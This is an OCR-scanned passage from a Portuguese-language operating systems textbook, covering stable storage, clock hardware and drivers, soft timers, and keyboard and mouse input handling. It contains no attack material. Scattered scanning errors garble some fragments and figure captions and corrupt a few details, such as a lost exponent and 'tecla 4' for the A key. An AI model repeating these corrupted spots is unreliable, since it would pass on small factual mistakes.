-lo. Após obtê-lo corretamente, o bloco correspondente 
na unidade 2 é escrito e verificado. Quando a escrita 
estável é concluída corretamente, ambos os blocos são 
sobrescritos com um número de bloco inválido e ve- 
rificados. Novamente aqui, após uma falha é fácil de 
determinar se uma escrita estável estava ou não em an- 
damento durante a falha. É claro, essa técnica exige oito 
operações de disco extras para escrever um bloco está- 
vel, de maneira que ela deve ser usada o menor número 
de vezes possível. 

Um último ponto que vale a pena destacar: presu- 
mimos que apenas uma falha espontânea de um blo- 
co bom para um bloco defeituoso acontece por par 
de blocos por dia. Se um número suficiente de dias 
passar, o outro bloco do par também poderá se tornar 
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defeituoso. Portanto, uma vez por dia uma varredura 
completa de ambos os discos deve ser feita, reparan- 
do qualquer defeito. Dessa maneira, todas as manhas 
ambos os discos estarão sempre idênticos. Mesmo que 
ambos os blocos em um par apresentarem defeitos 
dentro de um período de alguns dias, todos os erros 
serão reparados corretamente. 


5.5 Relógios 


Relógios (também chamados de temporizadores 
— timers) são essenciais para a operação de qualquer 
sistema multiprogramado por uma série de razões. Eles 
mantêm a hora do dia e evitam que um processo mono- 
polize a CPU, entre outras coisas. O software do relógio 
pode assumir a forma de um driver de dispositivo, em- 
bora um relógio não seja nem um dispositivo de bloco, 
como um disco, tampouco um dispositivo de caractere, 
como um mouse. Nosso exame de relógios seguirá o 
mesmo padrão que na seção anterior: primeiro abor- 
daremos o hardware de relógio e então o software de 
relógio. 


5.5.1 Hardware de relógios 


Dois tipos de relógios são usados em computadores, 
e ambos são bastante diferentes dos relógios de parede e 
de pulso usados pelas pessoas. Os relógios mais simples 
são ligados à rede elétrica de 110 ou 220 volts e causam 
uma interrupção a cada ciclo de voltagem, em 50 ou 
60 Hz. Esses relógios costumavam dominar o mercado, 
mas são raros hoje. 

O outro tipo de relógio é construído de três compo- 
nentes: um oscilador de cristal, um contador e um regis- 
trador de apoio, como mostrado na Figura 5.28. Quando 
um fragmento de cristal é cortado adequadamente e 
montado sob tensão, ele pode ser usado para gerar um 
sinal periódico de altíssima precisão, em geral na faixa 
de várias centenas de mega-hertz até alguns giga-hertz, 
dependendo do cristal escolhido. Usando a eletrônica, 
esse sinal básico pode ser multiplicado por um inteiro 
pequeno para conseguir frequências de até vários giga- 
-hertz ou mesmo mais. Pelo menos um circuito desses 
normalmente é encontrado em qualquer computador, 
fornecendo um sinal de sincronização para os vários 
circuitos do computador. Esse sinal é colocado em um 
contador para fazê-lo contar regressivamente até zero. 
Quando o contador chega a zero, ele provoca uma inter- 
rupção na CPU. 
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(eltt: Um relógio programável. 
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Relógios programáveis tipicamente têm vários mo- 
dos de operação. No modo disparo único (one-shot 
mode), quando o relógio é inicializado, ele copia o valor 
do registrador de apoio no contador e então decrementa 
o contador em cada pulso do cristal. Quando o contador 
chega a zero, ele provoca uma interrupção e para até 
que ele é explicitamente inicializado novamente pelo 
software. No modo onda quadrada, após atingir o zero 
e causar a interrupção, o registrador de apoio é automa- 
ticamente copiado para o contador, e todo o processo 
é repetido de novo indefinidamente. Essas interrupções 
periódicas são chamadas de tiques do relógio. 

A vantagem do relógio programável é que a sua 
frequência de interrupção pode ser controlada pelo 
software. Se um cristal de 500 MHz for usado, então 
o contador é pulsado a cada 2 ns. Com registradores 
de 32 bits (sem sinal), as interrupções podem ser pro- 
gramadas para acontecer em intervalos de 2 ns a 8,6 s. 
Chips de relógios programáveis costumam conter dois 
ou três relógios programáveis independentemente e 
têm muitas outras opções também (por exemplo, con- 
tar com incremento em vez de decremento, desabilitar 
interrupções, e mais). 

Para evitar que a hora atual seja perdida quando a 
energia do computador é desligada, a maioria dos com- 
putadores tem um relógio de back-up mantido por uma 
bateria, implementado com o tipo de circuito de baixo 
consumo usado em relógios digitais. O relógio de bate- 
ria pode ser lido na inicialização. Se o relógio de backup 
não estiver presente, o software pode pedir ao usuário 
a data e o horário atuais. Há também uma maneira pa- 
drão para um sistema de rede obter o horário atual de 
um servidor remoto. De qualquer modo, o horário é en- 
tão traduzido para o número de tiques de relógio desde 
as 12 horas de 1º de janeiro de 1970, de acordo com 
o Tempo Universal Coordenado (Universal Coordi- 
nated Time — UTC), antes conhecido como meio-dia 
de Greenwich, como o UNIX faz, ou de algum outro 
momento de referência. A origem do tempo para o Win- 
dows é o dia 1º de janeiro de 1980. Em cada tique de 


O contador é decrementado em cada pulso 


O registrador de apoio é usado para carregar o contador 


relógio, o tempo real é incrementado por uma conta- 
gem. Normalmente programas utilitários são fornecidos 
para ajustar manualmente o relógio do sistema e o reló- 
gio de backup e para sincronizar os dois. 


5.5.2 Software de relógio 


Tudo o que o hardware de relógios faz é gerar in- 
terrupções a intervalos conhecidos. Todo o resto envol- 
vendo tempo deve ser feito pelo software, o driver do 
relógio. As tarefas exatas do driver do relógio variam 
entre os sistemas operacionais, mas em geral incluem a 
maioria das ações seguintes: 


1. Manter o horário do dia. 

2. Evitar que processos sejam executados por mais 

tempo do que o permitido. 

Contabilizar o uso da CPU. 

4. Tratar a chamada de sistema alarm feita pelos 
processos do usuário. 

5. Fornecer temporizadores watch dog para partes 
do próprio sistema. 

6. Gerar perfis de execução, realizar monitoramen- 
tos e coletar estatísticas. 


(98) 


A primeira função do relógio — a manutenção da 
hora do dia (também chamada de tempo real) não é 
difícil. Ela apenas exige incrementar um contador a 
cada tique do relógio, como mencionado anteriormente. 
A única coisa a ser observada é o número de bits no 
contador da hora do dia. Com uma frequência de re- 
lógio de 60 Hz, um contador de 32 bits ultrapassaria 
sua capacidade em apenas um pouco mais de dois anos. 
Claramente, o sistema não consegue armazenar o tempo 
real como o número de tiques desde 1º de janeiro de 
1970 em 32 bits. 

Ha três maneiras de resolver esse problema. A pri- 
meira maneira é usar um contador de 64 bits, embo- 
ra fazê-lo torna a manutenção do contador mais cara, 
pois ela precisa ser feita muitas vezes por segundo. A 
segunda maneira é manter a hora do dia em segundos, 


em vez de em tiques, usando um contador subsidiário 
para contar tiques até que um segundo inteiro tenha sido 
acumulado. Como 2* segundos é mais do que 136 anos, 
esse método funcionará até o século XXII. 

A terceira abordagem é contar os tiques, mas fazê-lo 
em relação ao momento em que o sistema foi inicializa- 
do, em vez de em relação a um momento externo fixo. 
Quando o relógio de backup é lido ou o usuário digita o 
tempo real, a hora de inicialização do sistema é calcula- 
da a partir do valor da hora do dia atual e armazenada na 
memória de qualquer maneira conveniente. Mais tarde, 
quando a hora do dia for pedida, a hora do dia arma- 
zenada é adicionada ao contador para se chegar à hora 
do dia atual. Todas as três abordagens são mostradas na 
Figura 5.29. 

A segunda função do relógio é evitar que os proces- 
sos sejam executados por um tempo longo demais. Sem- 
pre que um processo é iniciado, o escalonador inicializa 
um contador com o valor do quantum do processo em 
tiques do relógio. A cada interrupção do relógio, o dri- 
ver decrementa o contador de quantum em 1. Quando 
chega a zero, o driver do relógio chama o escalonador 
para selecionar outro processo. 

A terceira função do relógio é contabilizar o uso da 
CPU. A maneira mais precisa de fazer isso é iniciali- 
zar um segundo temporizador, distinto do temporizador 
principal do sistema, sempre que um processo é inicia- 
do. Quando um processo é parado, o temporizador pode 
ser lido para dizer quanto tempo ele esteve em execu- 
ção. Para fazer as coisas direito, o segundo tempori- 
zador deve ser salvo quando ocorre uma interrupção e 
restaurado mais tarde. 

Uma maneira menos precisa, porém mais simples, 
para contabilizar o uso da CPU é manter um ponteiro 
para a entrada da tabela de processos relativa ao proces- 
so em execução em uma variável global. A cada tique 
do relógio, um campo na entrada do processo atual é 
incrementado. Dessa maneira, cada tique do relógio é 
“cobrado” do processo em execução no momento do ti- 
que. Um problema menor com essa estratégia é que se 
muitas interrupções ocorrerem durante a execução de um 
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processo, ele ainda será cobrado por um tique comple- 
to, mesmo que ele não tenha realizado muito trabalho. A 
contabilidade apropriada da CPU durante as interrupções 
é cara demais e feita raramente. 

Em muitos sistemas, um processo pode solicitar que 
o sistema operacional lhe dê um aviso após um determi- 
nado intervalo. O aviso normalmente é um sinal, inter- 
rupção, mensagem, ou algo similar. Uma aplicação que 
requer o uso desses avisos é a comunicação em rede, na 
qual um pacote sem confirmação de recebimento dentro 
de um determinado intervalo de tempo deve ser retrans- 
mitido. Outra aplicação é o ensino auxiliado por com- 
putador, onde um estudante que não dê uma resposta 
dentro de um determinado tempo recebe a resposta do 
computador. 

Se o driver do relógio tivesse relógios o bastante, ele 
poderia separar um relógio para cada solicitação. Não 
sendo o caso, ele deve simular múltiplos relógios virtu- 
ais com um único relógio físico. Uma maneira é manter 
uma tabela na qual o tempo do sinal para todos os tem- 
porizadores pendentes é mantido, assim como uma vari- 
ável dando o tempo para o próximo. Sempre que a hora 
do dia for atualizada, o driver confere para ver se o sinal 
mais próximo ocorreu. Se ele tiver ocorrido, a tabela 
é pesquisada para encontrar o próximo sinal a ocorrer. 

Se muitos sinais são esperados, é mais eficiente si- 
mular múltiplos relógios encadeando juntas todas as 
solicitações de relógio pendentes, ordenadas no tempo, 
em uma lista encadeada, como mostra a Figura 5.30. 
Cada entrada na lista diz quantos tiques do relógio des- 
de o sinal anterior deve-se esperar antes de gerar um 
novo sinal. Nesse exemplo, os sinais estão pendentes 
para 4203, 4207, 4213, 4215 e 4216. 

Na Figura 5.30, a interrupção seguinte ocorre em 3 
tiques. Em cada tique, o “Próximo sinal” é decrementa- 
do. Quando ele chega a 0, o sinal correspondente para o 
primeiro item na lista é gerado, e o item é removido da 
lista. Então “Próximo sinal” é ajustado para o valor na 
entrada agora no início da lista, 4 nesse exemplo. 

Observe que durante uma interrupção de relógio, 
seu driver tem várias coisas para fazer — incrementar 
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lc 1B) 7: EE Simulando múltiplos temporizadores com um único 
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o tempo real, decrementar o quantum e verificar o 0, 
realizar a contabilidade da CPU e decrementar o con- 
tador do alarme. No entanto, cada uma dessas ope- 
rações foi cuidadosamente arranjada para ser muito 
rápida, pois elas têm de ser feitas muitas vezes por 
segundo. 

Partes do sistema operacional também precisam esta- 
belecer temporizadores. Eles são chamados de tempori- 
zadores watchdog (cão de guarda) e são frequentemente 
usados (especialmente em dispositivos embarcados) para 
detectar problemas como travamentos do sistema. Por 
exemplo, um temporizador watchdog pode reinicializar 
um sistema que para de executar. Enquanto o sistema esti- 
ver executando, ele regularmente reinicia o temporizador, 
de maneira que ele nunca expira. Nesse caso, a expiração 
do temporizador prova que o sistema não executou por 
um longo tempo e leva a uma ação corretiva — como uma 
reinicialização completa do sistema. 

O mecanismo usado pelo driver do relógio para lidar 
com temporizadores watchdog é o mesmo que para os 
sinais do usuário. A única diferença é que, quando um 
temporizador é desligado, em vez de causar um sinal, 
o driver do relógio chama uma rotina fornecida pelo 
chamador. A rotina faz parte do código do chamador. A 
rotina chamada pode fazer o que for necessário, mesmo 
causar uma interrupção, embora dentro do núcleo as in- 
terrupções sejam muitas vezes inconvenientes e sinais 
não existem. Essa é a razão pela qual o mecanismo do 
watchdog é fornecido. É importante observar que o me- 
canismo de watchdog funciona somente quando o dri- 
ver do relógio e a rotina a ser chamada estão no mesmo 
espaço de endereçamento. 

Aúltima questão em nossa lista é o perfil de execução. 
Alguns sistemas operacionais fornecem um mecanismo 
pelo qual um programa do usuário pode obter do sistema 
um histograma do seu contador do programa, então ele 
pode ver onde está gastando seu tempo. Quando esse per- 
fil de execução é uma possibilidade, a cada tique o driver 
confere para ver se o perfil de execução do processo atual 
está sendo obtido e, se afirmativo, calcula o intervalo (uma 
faixa de endereços) correspondente ao contador do pro- 
grama atual. Ele então incrementa esse intervalo por um. 


Esse mecanismo também pode ser usado para extrair o 
perfil de execução do próprio sistema. 


5.5.3 Temporizadores por software 


A maioria dos computadores tem um segundo reló- 
gio programável que pode ser ajustado para provocar 
interrupções no temporizador a qualquer frequência 
de que um programa precisar. Esse temporizador é um 
acréscimo ao temporizador do sistema principal cujas 
funções foram descritas antes. Enquanto a frequência de 
interrupção for baixa, não há problema em se usar esse 
segundo temporizador para fins específicos da aplica- 
ção. O problema ocorre quando a frequência do tempo- 
rizador específico da aplicação for muito alta. A seguir 
descreveremos brevemente um esquema de temporiza- 
dor baseado em software que funciona bem em muitas 
circunstâncias, mesmo em frequências relativamente al- 
tas. A ideia é de autoria de Aron e Druschel (1999). Para 
mais detalhes, vejam o seu artigo. 

Em geral, há duas maneiras de gerenciar E/S: inter- 
rupções e polling. Interrupções têm baixa latência, isto 
é, elas acontecem imediatamente após o evento em si 
com pouco ou nenhum atraso. Por outro lado, com as 
CPUs modernas, as interrupções têm uma sobrecarga 
substancial pela necessidade de chaveamento de con- 
texto e sua influência no pipeline, TLB e cache. 

A alternativa às interrupções é permitir que a própria 
aplicação verifique por meio de polling (verificações 
ativas) o evento esperado em si. Isso evita interrupções, 
mas pode haver uma latência substancial, pois um even- 
to pode acontecer imediatamente após uma verificação, 
caso em que ele esperará quase um intervalo inteiro de 
verificação. Na média, a latência representa metade do 
intervalo de verificação. 

A latência de interrupção hoje só é um pouco melhor 
que a dos computadores na década de 1970. Na maioria 
dos minicomputadores, por exemplo, uma interrupção 
levava quatro ciclos de barramento: para empilhar o 
contador do programa e PSW e carregar um novo con- 
tador de programa e PSW. Hoje, lidar com a pipeline, 
MMU, TLB e cache representa um acréscimo à sobre- 
carga. Esses efeitos provavelmente piorarão antes de 
melhorar com o tempo, desse modo neutralizando as 
frequências mais rápidas de relógio. Infelizmente, para 
determinadas aplicações, não queremos nem a sobrecar- 
ga das interrupções, tampouco a latência do polling. 

Os temporizadores por software (soft timers) evi- 
tam interrupções. Em vez disso, sempre que o núcleo está 
executando por alguma outra razão, imediatamente antes 
de retornar para o modo do usuário ele verifica o relógio 


de tempo real para ver se um temporizador por softwa- 
re expirou. Se ele expirou, o evento escalonado (por 
exemplo, a transmissão de um pacote ou a verificação da 
chegada de um pacote) é realizado sem a necessidade de 
chavear para o modo núcleo, dado que o sistema já está 
ali. Após o trabalho ter sido realizado, o temporizador por 
software é reinicializado novamente. Tudo o que precisa 
ser feito é copiar o valor do relógio atual para o tempori- 
zador e acrescentar o intervalo de tempo a ele. 

Os temporizadores por software são dependentes da 
frequência na qual as entradas no núcleo são feitas por 
outras razões. Essas razões incluem: 


1. Chamadas de sistema. 
Faltas na TLB. 

Faltas de página. 
Interrupções de E/S. 
CPU se tornando ociosa. 


SA gas SS PO 


Para ver com que frequência esses eventos acon- 
tecem, Aron e Druschel tomaram medidas com várias 
cargas de CPUs, incluindo um servidor da web comple- 
tamente carregado, um servidor da web com um pro- 
cesso limitado por CPU em segundo plano, executando 
áudio da internet em tempo real e recompilando o nú- 
cleo do UNIX. A frequência média de entrada no núcleo 
variava de 2 a 18 us, com mais ou menos metade dessas 
entradas sendo chamadas de sistema. Desse modo, para 
uma aproximação de primeira ordem, a existência de 
um temporizador por software operando a cada, diga- 
mos, 10 us, é possível, apesar de esse tempo limite não 
ser cumprido ocasionalmente. Estar 10 us atrasado de 
tempos em tempos é muitas vezes melhor do que ter 
interrupções consumindo 35% da CPU. 

É claro, existirão períodos em que não haverá chama- 
das de sistema, faltas na TLB, ou faltas de páginas, caso 
em que nenhum temporizador por software será dispa- 
rado. Para colocar um limite superior nesses intervalos, 
o segundo temporizador de hardware pode ser ajustado 
para disparar, digamos, a cada 1 ms. Se a aplicação pu- 
der viver com apenas 1.000 ativações por segundo em 
intervalos ocasionais, então a combinação de temporiza- 
dores por software e um temporizador de hardware de 
baixa frequência pode ser melhor do que a E/S orientada 
somente à interrupção ou controlada apenas por polling. 


5.6 Interfaces com o usuário: teclado, 
mouse, monitor 


Todo computador de propósito geral tem um tecla- 
do e um monitor (e às vezes um mouse) para permitir 
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que as pessoas interajam com ele. Embora o teclado 
e o monitor sejam dispositivos tecnicamente separa- 
dos, eles funcionam bem juntos. Em computadores 
de grande porte, frequentemente há muitos usuários 
remotos, cada um com um dispositivo contendo um 
teclado e um monitor conectados. Esses dispositivos 
foram chamados historicamente de terminais. As pes- 
soas muitas vezes ainda usam o termo, mesmo quando 
discutindo teclados e computadores de computadores 
pessoais (na maior parte das vezes por falta de um ter- 
mo melhor). 


5.6.1 Software de entrada 


As informações do usuário vêm fundamentalmente 
do teclado e do mouse (ou às vezes das telas de toque), 
então vamos examiná-los. Em um computador pessoal, 
o teclado contém um microprocessador embutido que 
em geral comunica-se por uma porta serial com um 
chip controlador na placa-mãe (embora cada vez mais 
os teclados estejam conectados a uma porta USB). Uma 
interrupção é gerada sempre que uma tecla é pressio- 
nada e uma segunda é gerada sempre que uma tecla é 
liberada. Em cada uma dessas interrupções, o driver do 
teclado extrai as informações sobre o que acontece na 
porta de E/S associada com o teclado. Todo o restan- 
te acontece no software e é bastante independente do 
hardware. 

A maior parte do resto desta seção pode ser compre- 
endida mais claramente se pensarmos na digitação de 
comandos em uma janela de shell (interface de linha 
de comando). É assim que os programadores costumam 
trabalhar. Discutiremos interfaces gráficas a seguir. 
Alguns dispositivos, em particular telas de toque, são 
usados para entrada e saída. Fizemos uma escolha (ar- 
bitrária) para discuti-los na seção sobre dispositivos de 
saída. Discutiremos as interfaces gráficas mais adiante 
neste capítulo. 


Software de teclado 


O número no registrador de E/S é o número da tecla, 
chamado de código de varredura, não o código de AS- 
CII. Teclados normais têm menos de 128 teclas, então 
apenas 7 bits são necessários para representar o número 
da tecla. O oitavo bit é definido como O quando a tecla 
é pressionada e 1 quando ela é liberada. Cabe ao driver 
controlar o estado de cada tecla (pressionada ou libera- 
da). Assim, tudo o que o hardware faz é gerar interrup- 
ções de pressão e liberação. O software faz o resto. 
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Quando a tecla 4 é pressionada, por exemplo, o có- 
digo da tecla (30) é colocado em um registrador de E/S. 
Cabe ao driver determinar se ela é minúscula, maiúscu- 
la, CTRL-A, ALT-A, CTRL-ALT-A, ou alguma outra 
combinação. Tendo em vista que o driver pode dizer 
quais teclas foram pressionadas, mas ainda não libe- 
radas (por exemplo, SHIFT), ele tem informação sufi- 
ciente para fazer o trabalho. 

Por exemplo, a sequência de teclas 


DEPRESS SHIFT, DEPRESS A, RELEASE A, RE- 
LEASE SHIFT 


indica um caractere A maiúsculo. Contudo, a sequência 
de teclas 


DEPRESS SHIFT, DEPRESS A, RELEASE SHIFT, 
RELEASE A 


também indica um caractere A maiúsculo. Embora essa 
interface de teclado coloque toda a responsabilidade so- 
bre o software, ela é extremamente flexível. Por exem- 
plo, programas do usuário podem estar interessados se 
um dígito recém-digitado veio da fileira de teclado do 
topo do teclado ou do bloco numérico lateral. Em prin- 
cípio, o driver pode fornecer essa informação. 

Duas filosofias possíveis podem ser adotadas para o 
driver. Na primeira, seu trabalho é apenas aceitar a en- 
trada e passá-la adiante sem modificá-la. Um programa 
lendo a partir do teclado recebe uma sequência bruta 
de códigos ASCII. (Dar aos programas do usuário os 
números das teclas é algo primitivo demais, assim como 
dependente demais do teclado.) 

Essa filosofia é bastante adequada para as necessida- 
des de editores de tela sofisticados, como os emacs, os 
quais permitem que o usuário associe uma ação arbitrá- 
ria a qualquer caractere ou sequência de caracteres. Ela 
implica, no entanto, que se o usuário digitar dste em vez 
de date e então corrigir o erro digitando três caracteres 
de retrocesso e ate, seguidos de um caractere de retorno 
de carro (Carriage Return — CR), o programa do usuá- 
rio receberá todos os 11 caracteres digitados em código 
ASCH, como a seguir: 


dste— << ateCR 


Nem todos os programas querem tantos detalhes. 
Muitas vezes eles querem somente a entrada corrigi- 
da, não a sequência exata de como ela foi produzida. 
Essa observação leva à segunda filosofia: o driver lida 
com toda a edição interna da linha e entrega apenas 
as linhas corrigidas para os programas do usuário. A 
primeira filosofia é baseada em caracteres; a segunda 
em linhas. Na origem elas eram referidas como modo 
cru (raw mode) e modo cozido (cooked mode), 


respectivamente. O padrão POSIX usa o termo menos 
pitoresco modo canônico para descrever o modo basea- 
do em linhas. O modo não canônico é o equivalente ao 
modo cru, embora muitos detalhes do comportamento 
possam ser modificados. Sistemas compatíveis com o 
POSIX proporcionam várias funções de biblioteca que 
suportam selecionar qualquer um dos modos e modifi- 
car muitos parâmetros. 

Se o teclado estiver em modo canônico (cozido), os 
caracteres devem ser armazenados até que uma linha 
inteira tenha sido acumulada, pois o usuário pode sub- 
sequentemente decidir apagar parte dela. Mesmo que 
o teclado esteja em modo cru, o programa talvez ainda 
não tenha solicitado uma entrada, então os caracteres 
precisam ser armazenados para viabilizar a digita- 
ção antecipada. Um buffer dedicado pode ser usado 
ou buffers podem ser alocados de um reservatório 
(pool). No primeiro tipo, a digitação antecipada tem 
um limite; no segundo, não. Essa questão surge mais 
agudamente quando o usuário está digitando em uma 
janela de comandos (uma janela de linha de comandos 
no Windows) e recém-emitiu um comando (como uma 
compilação) que ainda não foi concluído. Caracteres 
subsequentes digitados precisam ser armazenados, 
pois o shell não está pronto para lê-los. Projetistas de 
sistemas que não permitem que os usuários digitem 
antecipadamente deveriam ser seriamente punidos, ou 
pior ainda, ser forçados a usar o próprio sistema. 

Embora o teclado e o monitor sejam dispositivos lo- 
gicamente separados, muitos usuários se acostumaram 
a ver somente os caracteres que eles recém-digitaram 
aparecer na tela. Esse processo é chamado de eco. 

O eco é complicado pelo fato de que um programa 
pode estar escrevendo para a tela enquanto o usuário 
está digitando (novamente, pense na digitação em uma 
janela do shell). No mínimo, o driver do teclado tem de 
descobrir onde colocar a nova entrada sem que ela seja 
sobrescrita pela saída do programa. 

O eco também fica complicado quando mais de 80 
caracteres têm de ser exibidos em uma janela com 80 
linhas de caracteres (ou algum outro número). Depen- 
dendo da aplicação, pode ser apropriado mostrar na li- 
nha seguinte os caracteres excedentes. Alguns drivers 
simplesmente truncam as linhas em 80 caracteres e des- 
cartam todos eles além da coluna 80. 

Outro problema é o tratamento da tabulação. Em 
geral, cabe ao driver calcular onde o cursor está atu- 
almente localizado, levando em consideração tanto a 
saída dos programas quanto a saída do eco e calcular o 
número adequado de espaços a ser ecoado. 


Agora chegamos ao problema da equivalência. Lo- 
gicamente, ao final de uma linha de texto, você quer 
um CR a fim de mover o cursor de volta para a coluna 
1, e um caractere de alimentação de linha para avançar 
para a próxima linha. Exigir que os usuários digitassem 
ambos ao final de cada linha não venderia bem. Cabe ao 
driver do dispositivo converter o que entrar para o for- 
mato usado pelo sistema operacional. No UNIX, a tecla 
Enter é convertida para uma alimentação de linha para 
armazenamento interno; no Windows ela é convertida 
para um CR seguido de uma alimentação de linha. 

Se a forma padrão for apenas armazenar uma ali- 
mentação de linha (a convenção UNIX), então CRs 
(criados pela tecla Enter) devem ser transformados em 
alimentações de linha. Se o formato interno for armaze- 
nar ambos (a convenção do Windows), então o driver 
deve gerar uma alimentação de linha quando recebe um 
CR e um CR quando recebe uma alimentação de linha. 
Não importa qual seja a convenção interna, o monitor 
pode exigir que tanto uma alimentação de linha quanto 
um CR sejam ecoados a fim de obter uma atualização 
adequada da tela. Em um sistema com múltiplos usuá- 
rios como um computador de grande porte, diferentes 
usuários podem ter diversos tipos de terminais conecta- 
dos a ele e cabe ao driver do teclado conseguir que to- 
das as combinações de CR/alimentação de linha sejam 
convertidas ao padrão interno do sistema e arranjar que 
todos os ecos sejam feitos corretamente. 

Quando operando em modo canônico, alguns dos ca- 
racteres de entrada têm significados especiais. A Figura 
5.31 mostra todos os caracteres especiais exigidos pelo 
padrão POSIX. Os caracteres-padrão são todos caracte- 
res de controle que não devem entrar em conflito com 
a entrada de texto ou códigos usados pelos programas; 
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todos, exceto os últimos dois, podem ser modificados 
com o controle do programa. 

O caractere ERASE permite que o usuário apague o 
caractere recém-digitado. Geralmente é a tecla de retro- 
cesso backspace (CTRL-H). Ele não é acrescentado à 
fila de caracteres; em vez disso remove o caractere an- 
terior da fila. Ele deve ser ecoado como uma sequência 
de três caracteres, retrocesso, espaço e retrocesso, a fim 
de remover o caractere anterior da tela. Se o caractere 
anterior era uma tabulação, apagá-lo depende de como 
ele foi processado quando digitado. Se ele for imediata- 
mente expandido em espaços, alguma informação extra 
é necessária para determinar até onde retroceder. Se a 
própria tabulação estiver armazenada na fila de entrada, 
ela pode ser removida e a linha inteira simplesmente 
enviada outra vez. Na maioria dos sistemas, o uso do 
retrocesso apenas apagará os caracteres na linha atual. 
Ele não apagará um CR e retornará para a linha anterior. 

Quando o usuário nota um erro no início da linha 
que está sendo digitada, muitas vezes é conveniente 
apagar a linha inteira e começar de novo. O caractere 
KILL apaga a linha inteira. A maioria dos sistemas faz 
a linha apagada desaparecer da tela, mas alguns mais 
antigos a ecoam mais um CR e uma linha de alimenta- 
ção, pois alguns usuários gostam de ver a linha antiga. 
Em consequência, como ecoar KILL é uma questão de 
gosto. Assim como o ERASE, normalmente não é pos- 
sível voltar mais do que a linha atual. Quando um bloco 
de caracteres é morto, talvez valha a pena para o driver 
retornar os buffers para o reservatório de buffers, caso 
um seja usado. 

As vezes, os caracteres ERASE ou KILL devem ser 
inseridos como dados comuns. O caractere LNEXT ser- 
ve como um caractere de escape. No UNIX, o CTRL-V 



































|FIGURA 5.31 | Caracteres tratados especialmente no modo canônico. 
Caractere Nome POSIX Comentário 
CTRL-H ERASE Apagar um caractere à esquerda 
CTRL-U KILL Apagar toda a linha em edição 
CTRL-V LNEXT Interpretar literalmente o próximo caractere 
CTRL-S STOP Parar a saída 
CTRL-Q START Iniciar a saída 
DEL INTR Interromper processo (SIGINT) 
CTRL QUIT Forçar gravação da imagem da memória (SIGQUIT) 
CTRL-D EOF Final de arquivo 
CTRL-M CR Retorno do carro (não modificavel) 
CTRL-J NL Alimentação de linha (não modificável) 
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é o padrão. Como um exemplo, sistemas UNIX mais 
antigos muitas vezes usavam o sinal @ para KILL, mas 
o sistema de correio da internet usa endereços da forma 
linda@cs.washington.edu. Quem se sentir mais confor- 
tável com as convenções mais antigas pode redefinir 
KILL como @, mas então precisará inserir um sinal (a) 
literalmente para os endereços eletrônicos. Isso pode ser 
feito digitando CTRL-V @. O CTRL-V em si pode ser 
inserido literalmente digitando CTRL-V duas vezes em 
sequência. Após ver um CTRL-V, o driver dá um sinal 
dizendo que o próximo caractere é isento de processa- 
mento especial. O caractere LNEXT em si não é inserido 
na fila de caracteres. 

Para permitir que os usuários parem uma imagem na 
tela que está saindo de seu campo de visão, códigos de 
controle são fornecidos para congelar a tela e reinicia- 
lizá-la mais tarde. No UNIX esses são STOP (CTRL- 
-S) e START (CTRL-Q), respectivamente. Eles não são 
armazenados, mas são usados para ligar e desligar um 
sinal na estrutura de dados do teclado. Sempre que ocor- 
re uma tentativa de saída, o sinal é inspecionado. Se ele 
está ligado, a saída não ocorre. Em geral, o eco também 
é suprimido junto com a saída do programa. 

Muitas vezes é necessário matar um programa des- 
controlado que está sendo depurado. Os caracteres 
INTR (DEL) e QUIT (CTRL-\) podem ser usados para 
esse fim. No UNIX, DEL envia o sinal SIGINT para to- 
dos os processos inicializados a partir daquele teclado. 
Implementar o DEL pode ser bastante complicado, pois 
o UNIX foi projetado desde o início para lidar com múl- 
tiplos usuários ao mesmo tempo. Desse modo, no caso 
geral, podem existir muitos processos sendo executados 
em prol de muitos usuários, e a tecla DEL deve sinalizar 
apenas os processos do próprio usuário. A parte difícil 
é fazer chegar a informação do driver para a parte do 
sistema que lida com sinais, a qual, afinal de contas, não 
pediu por essa informação. 

O CTRLA é similar ao DEL, exceto que ele envia o 
sinal SIGQUIT, que força a gravação da imagem da me- 
mória (core dump) se não for pego ou ignorado. Quando 
qualquer uma dessas teclas é acionada, o driver deve 
ecoar um CR e linha de alimentação e descartar todas 
as entradas acumuladas para permitir um novo começo. 
O valor padrão para INTR é muitas vezes CTRL-C em 
vez de DEL, tendo em vista que muitos programas usam 
DEL e a tecla de retrocesso de modo alternado para a 
edição. 

Outro caractere especial é EOF (CTRL-D), que no 
UNIX faz que quaisquer solicitações de leitura penden- 
tes para o terminal sejam satisfeitas com o que quer que 
esteja disponível no buffer, mesmo que o buffer esteja 


vazio. Digitar CTRL-D no início de uma linha faz que 
o programa receba uma leitura de O byte, o que por con- 
venção é interpretado como fim de arquivo e faz que 
a maioria dos programas aja do mesmo jeito que eles 
fariam se vissem o fim de arquivo em um arquivo de 
entrada. 


Software do mouse 


A maioria dos PCs tem um mouse, ou às vezes um 
trackball (que é apenas um mouse deitado de costas). 
Um tipo comum de mouse tem uma bola de borracha 
dentro que sai parcialmente através de um buraco na 
parte de baixo e gira à medida que o mouse é movi- 
do sobre uma superfície áspera. À medida que a bola 
gira, ela desliza contra rolos de borracha colocados em 
bastões ortogonais. O movimento na direção leste-oeste 
faz girar o bastão paralelo ao eixo y; o movimento na 
direção norte-sul faz girar o bastão paralelo ao eixo x. 

Outro tipo popular é o mouse óptico, que é equipado 
com um ou mais diodos emissores de luz e fotodetec- 
tores na parte de baixo. Os primeiros tinham de operar 
em um mouse pad especial com uma grade retangular 
traçada nele de maneira que o mouse pudesse contar as 
linhas cruzadas. Os mouses ópticos modernos contêm 
um chip de processamento de imagens e tiram fotos de 
baixa resolução contínuas da superfície debaixo deles, 
procurando por mudanças de uma imagem para outra. 

Sempre que um mouse se move uma determinada 
distância mínima em qualquer direção ou que um bo- 
tão é acionado ou liberado, uma mensagem é enviada 
para o computador. A distância mínima é de mais ou 
menos 0,1 mm (embora ela possa ser configurada no 
software). Algumas pessoas chamam essa unidade de 
mickey. Mouses podem ter um, dois, ou três botões, 
dependendo da estimativa dos projetistas sobre a capa- 
cidade intelectual dos usuários de controlar mais do que 
um botão. Alguns mouses têm rodas que podem enviar 
dados adicionais de volta para o computador. Os mou- 
ses wireless são iguais aos conectados, exceto que em 
vez de enviar seus dados de volta para o computador 
através de um cabo, eles usam rádios de baixa potência, 
por exemplo, usando o padrão Bluetooth. 

A mensagem para o computador contém três itens: 
Ax, Ay, botões. O primeiro item é a mudança na posi- 
ção x desde a última mensagem. Então vem a mudan- 
ça na posição y desde a última mensagem. Por fim, o 
estado dos botões é incluído. O formato da mensagem 
depende do sistema e do número de botões que o mouse 
tem. Normalmente, são necessários 3 bytes. A maioria 
